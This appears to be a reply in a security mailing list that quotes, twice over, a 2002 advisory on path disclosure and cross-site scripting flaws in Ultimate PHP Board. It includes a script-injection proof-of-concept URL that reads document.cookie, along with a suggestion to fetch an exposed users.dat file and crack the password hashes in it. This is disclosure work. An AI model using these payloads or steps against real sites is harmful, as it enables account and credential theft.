Anything about UPB was already wrote (1.1 & 1.0beta) :
http://www.frogsecure.com/tutos/UPB.txt
>From: "euronymous" <just-a-user (at) yandex (dot) ru [email concealed]>
>Reply-To: just-a-user (at) yandex (dot) ru [email concealed]
>To: bugtraq (at) securityfocus (dot) com [email concealed], vulnwatch (at) vulnwatch (dot) org [email concealed]
>Subject: XSS and Path Disclosure in UPB
>Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)
>
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>topic: XSS and Path Disclosure in UPB
>product: Ultimate PHP Board (UPB) final beta 1.0
>vendor: http://www.webrc.ca/php/upb.php
>risk: middle
>date: 12/7/2k2
>discovered by: euronymous /F0KP /HACKRU Team
>advisory url: http://f0kp.iplus.ru/bz/009.txt
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>
>description
>-----------
>
>1) when calling add.php, which comming with upb, it output some
>error message, that contain foloving information:
>
>================================================================
>Warning: Failed opening 'textdb_v2.inc.php' for inclusion
>(include_path='.:/usr/local/lib/php') in
>/home/samcom/public_html/public/messageboard2/add.php on line 5
>attempting to edit record...
>
>Fatal error: Call to undefined function: format_field() in
>/home/samcom/public_html/public/messageboard2/add.php on line 11
>================================================================
>
>as you can see, script output contain full physical path of the
>board.
>
>2). but if user has deleted this file (add.php) u can to view
>the full path in this way:
>
>==============================================================
>http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
>==============================================================
>
>cos the `id' parameter doesnt check if input data has entered
>correctly, then it output folloving error message:
>
>===================--======= snip =============================
>Warning: Unable to access ./data_dir/some_shit.dat in
>/home/samcom/public_html/public/messageboard2/textdb.inc.php on
>line 240
>
>..
>
>Warning: Supplied argument is not a valid File-Handle resource
>in /home/samcom/public_html/public/messageboard2/textdb.inc.php
>on line 241
>
>..
>=========================== snip ==============================
>
>where `data_dir' is the name of directory, where stored important
>files, eg users.dat with users passwords (md5). in default name
>of this directory is `db'.
>
>if user doesnt make this dir secure, then you can to get the users
>passwds with reading file users.dat (default name.. but it is an
>old stuff) and cracking the .md5 hashes.
>
>3) cos the above, file viewtopic.php doesnt check at all, the you
>can insert some html in scripts output:
>
>========================================================
>http://hostname.com/phorum/viewtopic.php?id=
>%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
>========================================================
>
>[it must be in a single string]
>
>not URL-encoded string working fine also.
>ps. all of this issues applied to previus versions upb.
>
>shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
>russian security guyz!! and kate for she is kewl girl ))
>fuck_off: slavomira and other dirty ppl in *.kz
>
>================
>im not a lame,
>not yet a hacker
>================
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
Anything about UPB was already wrote (1.1 & 1.0beta) :
http://www.frogsecure.com/tutos/UPB.txt
>From: "euronymous" <just-a-user (at) yandex (dot) ru [email concealed]>
>Reply-To: just-a-user (at) yandex (dot) ru [email concealed]
>To: bugtraq (at) securityfocus (dot) com [email concealed], vulnwatch (at) vulnwatch (dot) org [email concealed]
>Subject: XSS and Path Disclosure in UPB
>Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)
>
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>topic: XSS and Path Disclosure in UPB
>product: Ultimate PHP Board (UPB) final beta 1.0
>vendor: http://www.webrc.ca/php/upb.php
>risk: middle
>date: 12/7/2k2
>discovered by: euronymous /F0KP /HACKRU Team
>advisory url: http://f0kp.iplus.ru/bz/009.txt
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>
>description
>-----------
>
>1) when calling add.php, which comming with upb, it output some
>error message, that contain foloving information:
>
>================================================================
>Warning: Failed opening 'textdb_v2.inc.php' for inclusion
>(include_path='.:/usr/local/lib/php') in
>/home/samcom/public_html/public/messageboard2/add.php on line 5
>attempting to edit record...
>
>Fatal error: Call to undefined function: format_field() in
>/home/samcom/public_html/public/messageboard2/add.php on line 11
>================================================================
>
>as you can see, script output contain full physical path of the
>board.
>
>2). but if user has deleted this file (add.php) u can to view
>the full path in this way:
>
>==============================================================
>http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
>==============================================================
>
>cos the `id' parameter doesnt check if input data has entered
>correctly, then it output folloving error message:
>
>===================--======= snip =============================
>Warning: Unable to access ./data_dir/some_shit.dat in
>/home/samcom/public_html/public/messageboard2/textdb.inc.php on
>line 240
>
>..
>
>Warning: Supplied argument is not a valid File-Handle resource
>in /home/samcom/public_html/public/messageboard2/textdb.inc.php
>on line 241
>
>..
>=========================== snip ==============================
>
>where `data_dir' is the name of directory, where stored important
>files, eg users.dat with users passwords (md5). in default name
>of this directory is `db'.
>
>if user doesnt make this dir secure, then you can to get the users
>passwds with reading file users.dat (default name.. but it is an
>old stuff) and cracking the .md5 hashes.
>
>3) cos the above, file viewtopic.php doesnt check at all, the you
>can insert some html in scripts output:
>
>========================================================
>http://hostname.com/phorum/viewtopic.php?id=
>%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
>========================================================
>
>[it must be in a single string]
>
>not URL-encoded string working fine also.
>ps. all of this issues applied to previus versions upb.
>
>shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
>russian security guyz!! and kate for she is kewl girl ))
>fuck_off: slavomira and other dirty ppl in *.kz
>
>================
>im not a lame,
>not yet a hacker
>================
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
[ reply ]